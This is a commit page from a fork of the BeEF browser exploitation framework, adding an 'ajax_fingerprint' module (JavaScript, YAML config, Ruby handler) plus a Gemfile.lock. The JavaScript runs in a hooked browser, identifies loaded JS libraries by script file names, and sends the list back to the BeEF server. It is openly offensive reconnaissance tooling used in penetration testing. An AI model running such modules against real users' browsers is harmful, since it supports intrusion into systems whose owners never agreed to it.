Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #665 from qswain2/master

Browse Source 
Added a module to fingerprint ajax
This commit is contained in:
Brendan Coles
2012-04-29 22:03:52 -07:00
parent 05deaaa8b5 958ddb4845
commit 215ddd9cf5
4 changed files with 209 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

60
Gemfile.lock Normal file
View File

@@ -0,0 +1,60 @@
GEM
remote: http://rubygems.org/
specs:
addressable (2.2.7)
ansi (1.4.2)
daemons (1.1.8)
data_objects (0.10.8)
addressable (~> 2.1)
dm-core (1.2.0)
addressable (~> 2.2.6)
dm-do-adapter (1.2.0)
data_objects (~> 0.10.6)
dm-core (~> 1.2.0)
dm-migrations (1.2.0)
dm-core (~> 1.2.0)
dm-sqlite-adapter (1.2.0)
dm-do-adapter (~> 1.2.0)
do_sqlite3 (~> 0.10.6)
do_sqlite3 (0.10.8)
data_objects (= 0.10.8)
erubis (2.7.0)
eventmachine (0.12.10)
json (1.6.6)
librex (0.0.65)
msfrpc-client (1.0.1)
librex (>= 0.0.32)
msgpack (>= 0.4.5)
msgpack (0.4.6)
parseconfig (0.5.2)
rack (1.4.1)
rack-protection (1.2.0)
rack
sinatra (1.3.2)
rack (~> 1.3, >= 1.3.6)
rack-protection (~> 1.2)
tilt (~> 1.3, >= 1.3.3)
term-ansicolor (1.0.7)
thin (1.3.1)
daemons (>= 1.0.9)
eventmachine (>= 0.12.6)
rack (>= 1.0.0)
tilt (1.3.3)
PLATFORMS
ruby
DEPENDENCIES
ansi
data_objects
dm-core
dm-migrations
dm-sqlite-adapter
erubis
eventmachine (= 0.12.10)
json
msfrpc-client
parseconfig
sinatra (= 1.3.2)
term-ansicolor
thin

93
modules/browser/ajax_fingerprint/command.js Normal file
View File

@@ -0,0 +1,93 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
//Regular expression to match script names in source
var regex = new RegExp('/\\w*\.(min\.)?js');
var results = [];
var urls = "";
Array.prototype.unique = function() {
var o = {}, i, l = this.length, r = [];
for(i=0; i<l;i+=1) o[this[i]] = this[i];
for(i in o) r.push(o[i]);
return r;
};
// Fingerprints of javascript /ajax libraries . Library Name: Array of common file names
var fingerprints = {
"Prototype":new Array("prototype"),
"script.aculous":new Array("builder","controls","dragdrop","effects","scriptaculous","slider","unittest"),
"Dojo":new Array("dojo.uncompressed","uncompressed","dojo"),
"DWR":new Array("auth","engine","util"),
"Moo.fx/":new Array("Moo","Function","Array","String","Element","Fx","Dom","Ajax","Drag","Windows","Cookie","Json","Sortable","Fxpack","Fxutils","Fxtransition","Tips","Accordion"),
"Rico": new Array("rico","ricoAjax","ricoCommon","ricoEffects","ricoBehaviours","ricoDragDrop","ricoComponents"),
"Mootools":new Array("mootools","mootools-core-1.4-full","mootools-more-1.4-full"),
"Mochikit":new Array("Mochikit"),
"Yahoo UI!": new Array("animation","autocomplete","calendar","connection","container","dom","enevet","logger","menu","slider","tabview","treeview","utilities","yahoo","yahoo-dom-event"),
"xjax":new Array("xajax","xajax_uncompressed"),
"GWT": new Array("gwt","search-results"),
"Atlas": new Array("AtlasRuntime","AtlasBindings","AtlasCompat","AtlasCompat2"),
"jquery":new Array("jquery","jquery-latest","jquery-latest","jquery-1.5"),
"ExtJS":new Array("ext-all"),
"Prettify":new Array("prettify"),
"Spry": new Array("SpryTabbedPanels","SpryDOMUtils","SpryData","SpryXML","SpryUtils","SpryURLUtils","SpryDataExtensions","SpryDataShell","SpryEffects","SpryPagedView","SpryXML"),
"Google JS Libs":new Array("xpath","urchin","ga"),
"Libxmlrequest":new Array("libxmlrequest"),
"jx":new Array ("jx","jxs"),
"bajax":new Array("bajax"),
"AJS": new Array ("AJS","AJS_fx"),
"Greybox":new Array("gb_scripts.js"),
"Qooxdoo":new Array("qx.website-devel","qooxdoo-1.6","qooxdoo-1.5.1","qxserver","q","q.domain","q.sticky","q.placeholder","shCore","shBrushScript"),
};
function fp() {
try{
var sc = document.scripts;
var urls ="";
var source = ""
if (sc != null){
for (sc in document.scripts){
source =document.scripts[sc]['src'] || "";
if(source !=""){
//get the script file name and remove unnecessary endings and such
var comp = source.match(regex).toString().replace(new RegExp("/|.min|.pack|.uncompressed|.js\\W","g"),"");
for (key in fingerprints){
for (name in fingerprints[key]){
// match name in the fingerprint object
if(comp==fingerprints[key][name]){
results.push("Lib:"+key+" src:"+source);
}
}
}
}
}
}
if(results.length >0){
urls=results.unique().join('||');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+urls);
}
else{
beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+urls);
}
}
catch(e){
results = "Fingerprint failed: "+e.message;
beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+results.toString());
}
}
fp();
});

28
modules/browser/ajax_fingerprint/config.yaml Normal file
View File

@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
ajax_fingerprint:
enable: true
category: "Browser"
name: "Fingerprint Ajax"
description: "Fingerprint Ajax and JS libraries present"
authors: ["qswain"]
target:
working: ["FF","S"]
not_working: ["C"]

28
modules/browser/ajax_fingerprint/module.rb Normal file
View File

@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class Ajax_fingerprint < BeEF::Core::Command
def post_execute
puts 'Post'
content = {}
content['script_urls'] = @datastore['script_urls'] if not @datastore['script_urls'].nil?
if content.empty?
content['fail'] = 'Failed to fingerprint ajax.'
end
save content
end
end